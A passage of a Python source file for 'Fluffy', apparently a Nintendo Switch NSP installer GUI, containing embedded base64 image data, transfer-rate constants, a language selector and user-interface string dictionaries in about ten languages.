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'
DONUT_DATA = DARK_DONUT_DATA
class TransferRates:
Safe = 0x1F4
Normal = 0x100000
TransferRateDict = {0: TransferRates.Safe,
1: TransferRates.Normal}
# "Language!" -Cap, May 1st 2015
def set_language(v):
global language
language = v
if v == 0:
Language.CurrentDict = Language.EnglishDict
elif v == 1:
Language.CurrentDict = Language.ChineseDict
elif v == 2:
Language.CurrentDict = Language.VietDict
elif v == 3:
Language.CurrentDict = Language.TurkishDict
elif v == 4:
Language.CurrentDict = Language.BrazilianDict
elif v == 5:
Language.CurrentDict = Language.ItalianDict
elif v == 6:
Language.CurrentDict = Language.FrenchDict
elif v == 7:
Language.CurrentDict = Language.SpanishDict
elif v == 8:
Language.CurrentDict = Language.GermanDict
elif v == 9:
Language.CurrentDict = Language.IndonesiaDict
elif v == 10:
Language.CurrentDict = Language.KoreanDict
class Language:
CurrentDict = None
EnglishDict = {0: "Fluffy",
1: "Begin Transfer",
2: "Switch IP",
3: "This Computer's IP",
4: "USB Transfer Mode",
5: "Normal Mode",
6: "Safe Mode",
7: "Current NSP",
8: "Successfully Installed",
9: "Awaiting Selection",
10: "Switch Not Detected",
11: "Switch Detected",
12: "Network Mode",
13: "NSP Selection",
14: "NSP(s) Selected",
15: "Awaiting Connection Request",
16: "Cancel",
17: "Error: Goldleaf threw an exception.",
18: "Error: Tinfoil threw an exception.",
19: "Error: Network threw an exception.",
20: "Dark Mode",
21: "Options",
22: "Language",
23: "Github",
24: "Network",
25: "Headers Sent",
26: "NSP(s) in Queue",
27: "Installing",
28: "Transfer Rate",
29: "Current NCA",
30: "About",
31: "Special Thanks",
32: "Donate",
}
ChineseDict = {0: "Fluffy 卷卷安装器",
1: "开始传输",
2: "Switch的IP地址",
3: "此电脑的IP地址",
4: "USB传输模式",
5: "正常模式",
6: "安全模式",
7: "当前的NSP游戏文件",
8: "成功安装",
9: "等待选择",
10: "Switch没有连接",
11: "Switch已连接",
12: "网络模式",
13: "选择NSP游戏文件",
14: "个NSP游戏文件 已选择",
15: "等待连接",
16: "取消",
17: "错误: Goldleaf 反馈了一个异常.",
18: "错误: Tinfoil 反馈了一个异常.",
19: "错误: 网络状态 反馈了一个异常.",
20: "黑暗模式",
21: "选项",
22: "语言切换",
23: "Github主页地址",
24: "网络",
25: "发送NSP头文件",
26: "个NSP游戏文件 在队列中",
27: "NSP游戏文件 安装中",
28: "传输速率",
29: "当前的NCA游戏文件包",
30: "学分",
31: "谢谢",
32: "捐赠给我",
}
VietDict = { 0: "Fluffy",
1: "Bắt Đầu Chuyển",
2: "IP Của Switch",
3: "IP Của Máy Vi Tính",
4: "Tốc Độ USB",
5: "Tốc Độ Bình Thường",
6: "Tốc Độ Chậm",
7: "Đang Chuyển NSP",
8: "Tải Xông",
9: "Hãy Chọn NSP Của Bạn",
10: "Không Thể Tìm Thấy Switch Của Bạn",
11: "Tìm Được Switch Của Bạn",
12: "Bạn Đã Chọn Chuyển Bằng Wi-Fi",
13: "Xin Vui Lòng Chọn NSP",
14: "Cái NSP(s) Đã Được Chọn",
15: "Đang Chờ Yêu Cầu Kết Nối",
16: "Hủy Bỏ",
17: "Error: Goldleaf ngừng hoạt động.",
18: "Error: Tinfoil ngừng hoạt động.",
19: "Error: Network ngừng hoạt động.",
20: "Hình Tối",
21: "Sự Lựa Chọn",
22: "Ngôn Ngữ",
23: "Github",
24: "Network",
25: "Danh Sách NSP Đã Gởi Cho Bạn",
26: "Đang Chờ Chuyển NSP(s)",
27: "Đang Tải",
28: "Tốc Độ",
29: "Đang Chuyển NCA",
30: "Thông Tin",
31: "Cảm ơn bạn",
32: "Tặng Tôi",
}
BrazilianDict = {0: "Fluffy",
1: "INICIAR TRANSFERÊNCIA",
2: "IP do Switch",
3: "IP deste computador",
4: "Modo de transferência USB",
5: "Modo normal",
6: "Modo seguro",
7: "NSP atual",
8: "Instalado com sucesso",
9: "Aguardando seleção",
10: "Switch não detectado",
11: "Switch detectado",
12: "Modo de rede",
13: "Selecione o NSP",
14: "NSP(s) selecionados",
15: "Aguardando pedido de conexão",
16: "CANCELAR",
17: "Erro: Problema reportado pelo Goldleaf.",
18: "Erro: Problema reportado pelo Tinfoil.",
19: "Erro: Problema reportado pela rede.",
20: "Tema escuro",
21: "Opções",
22: "Língua",
23: "Github",
24: "Rede",
25: "Cabeçalho enviado",
26: "NSP(s) em fila",
27: "Instalando",
28: "Velocidade de transferência",
29: "NCA atual",
30: "Informação",
31: "Obrigado",
32: "Doe Para Mim",
}
ItalianDict = {0: "Fluffy",
1: "Inizia Trasferimento",
2: "IP della Switch",
3: "IP di questo Computer",
4: "Trasferimento USB",
5: "Modalità Normale",
6: "Modalità Sicura",
7: "NSP Corrente",
8: "Installazione Avvenuta con Successo",
9: "In attesa di selezione",
10: "Switch Non Rilevata",
11: "Switch Rilevata",
12: "Modalità Network",
13: "Seleziona NSP",
14: "NSP(s) Selezionato(i)",
15: "In Attesa di Richiesta di Connessione",
16: "Annulla",
17: "Errore: Goldleaf ha lanciato una eccezione.",
18: "Errore: Tinfoil ha lanciato una eccezione.",
19: "Errore: eccezione nella Modalità Network.",
20: "Dark Mode",
21: "Opzioni",
22: "Lingua",
23: "Github",
24: "Network",
25: "Headers Inviati",
26: "NSP(s) in Coda",
27: "Installazione in Corso",
28: "Velocità di Trasferimento",
29: "NCA Corrente",
30: "Informazione",
31: "Grazie",
32: "Dona A Me",
}
TurkishDict = {0: "Fluffy",
1: "Aktarmaya Başla",
2: "Switch IP 'si",
3: "Bu bilgisayarın IP 'si",
4: "USB Transfer Modu",
5: "Normal Mod",
6: "Güvenli Mod",
7: "Şu anki NSP",
8: "Başarıyla Yüklendi",
9: "Seçim Bekleniyor",
10: "Switch Algılanamadı",
11: "Switch Algılandı",
12: "Ağ Modu",
13: "NSP Seçimi",
14: "NSP(ler) Seçildi",
15: "Bağlantı İsteği Bekleniyor",
16: "İptal",
17: "Hata: Goldleaf 'te sıradışı durum oluştu.",
18: "Hata: Tinfoil 'de sıradışı durum oluştu.",
19: "Hata: Ağda sıradışı durum oluştu.",
20: "Karanlık Mod",
21: "Ayarlar",
22: "Dil",
23: "Github",
24: "Ağ",
25: "Başlık Gönderildi",
26: "Sıradaki NSP(ler)",
27: "Yükleniyor",
28: "Aktarma Hızı",
29: "Şu anki NCA",
30: "Bilgi",
31: "Teşekkür Ederim",
32: "Bağış",
}
FrenchDict = {0: "Fluffy",
1: "Démarrer le Transfert",
2: "IP de la Switch",
3: "IP de l'Ordinateur",
4: "Mode de Transfert USB",
5: "Mode Normal",
6: "Mode Sûr",
7: "NSP Actuel",
8: "Installé Avec Succès",
9: "En Attente de Sélection",
10: "Switch Non Détecté",
11: "Switch Détecté",
12: "Mode Réseau",
13: "Ajouter NSP",
14: "NSP(s) Sélectionné(s)",
15: "En Attente de la Demande de Connection",
16: "Annuler",
17: "Erreur: Goldleaf a généré une exception.",
18: "Erreur: Tinfoil a généré une exception.",
19: "Erreur: Le réseau a généré une exception.",
20: "Mode Sombre",
21: "Options",
22: "Langue",
23: "Github",
24: "Réseau",
25: "En-têtes Envoyées",
26: "NSP(s) en File d'Attente",
27: "En Cours d'Installation",
28: "Débit",
29: "NCA Actuel",
30: "À Propos",
31: "Remerciements",
32: "Faire Un Don",
}
SpanishDict = {0: "Fluffy",
1: "Iniciar la Transferencia",
2: "IP de la Switch",
3: "IP del Ordenador",
4: "Modo de Transferencia USB",
5: "Modo Normal",
6: "Modo Seguro",
7: "NSP Actual",
8: "Instalado Con Éxito",
9: "Esperando Selección",
10: "Switch No Detectada",
11: "Switch Detectada",
12: "Modo Red",
13: "Añadir NSP",
14: "NSP(s) Seleccionado(s)",
15: "Esperando la Solicitud de Conexión",
16: "Cancelar",
17: "Error: Goldleaf ha generado una excepción.",
18: "Error: Tinfoil ha generado une excepción.",
19: "Error: El red ha generado une excepción.",
20: "Modo Oscuro",
21: "Opciones",
22: "Idioma",
23: "Github",
24: "Red",
25: "Cabeceras Enviadas",
26: "NSP(s) en la Cola",
27: "Instalando",
28: "Velocidad",
29: "NCA Actual",
30: "Sobre Fluffy",
31: "Muchas Gracias",
32: "Hacer Una Donación",
}
GermanDict = {0: "Fluffy",
1: "Übertragung starten",
2: "Switch-IP-Adresse",
3: "Computer-IP-Adresse",
4: "USB-Übertragungsmodus",
5: "Normaler Modus",
6: "Sicherer Modus",
7: "Momentane NSP",
8: "Erfolgreich installiert",
9: "Warte auf Auswahl",
10: "Keine Switch erkannt",
11: "Switch erkannt",
12: "Netzwerk-Modus",
13: "NSP-Auswahl",
14: "NSP(s) ausgewählt",
15: "Warte auf Verbindung",
16: "Abbrechen",
17: "Goldleaf-Fehler!",
18: "Tinfoil-Fehler!",
19: "Netzwerk-Fehler!",
20: "Dunkles Design",
21: "Einstellungen",
22: "Sprache",
23: "GitHub",
24: "Netzwerk",
25: "Header gesendet",
26: "NSP(s) in Warteschlange",
27: "Installiere",
28: "Transferrate",
29: "Aktuelle NCA",
30: "Über",
31: "Besonderer Dank",
32: "Spenden",
}
IndonesiaDict = {0: "Fluffy",
1: "Memulai Transfer",
2: "Ganti IP",
3: "IP Komputer Ini",
4: "Mode Transfer melalui USB",
5: "Mode Normal",
6: "Mode Aman",
7: "NSP Saat Ini",
8: "Penerapaan Berhasil",
9: "Menunggu Pilihan",
10: "Switch tidak terdeteksi",
11: "Switch terdeteksi",
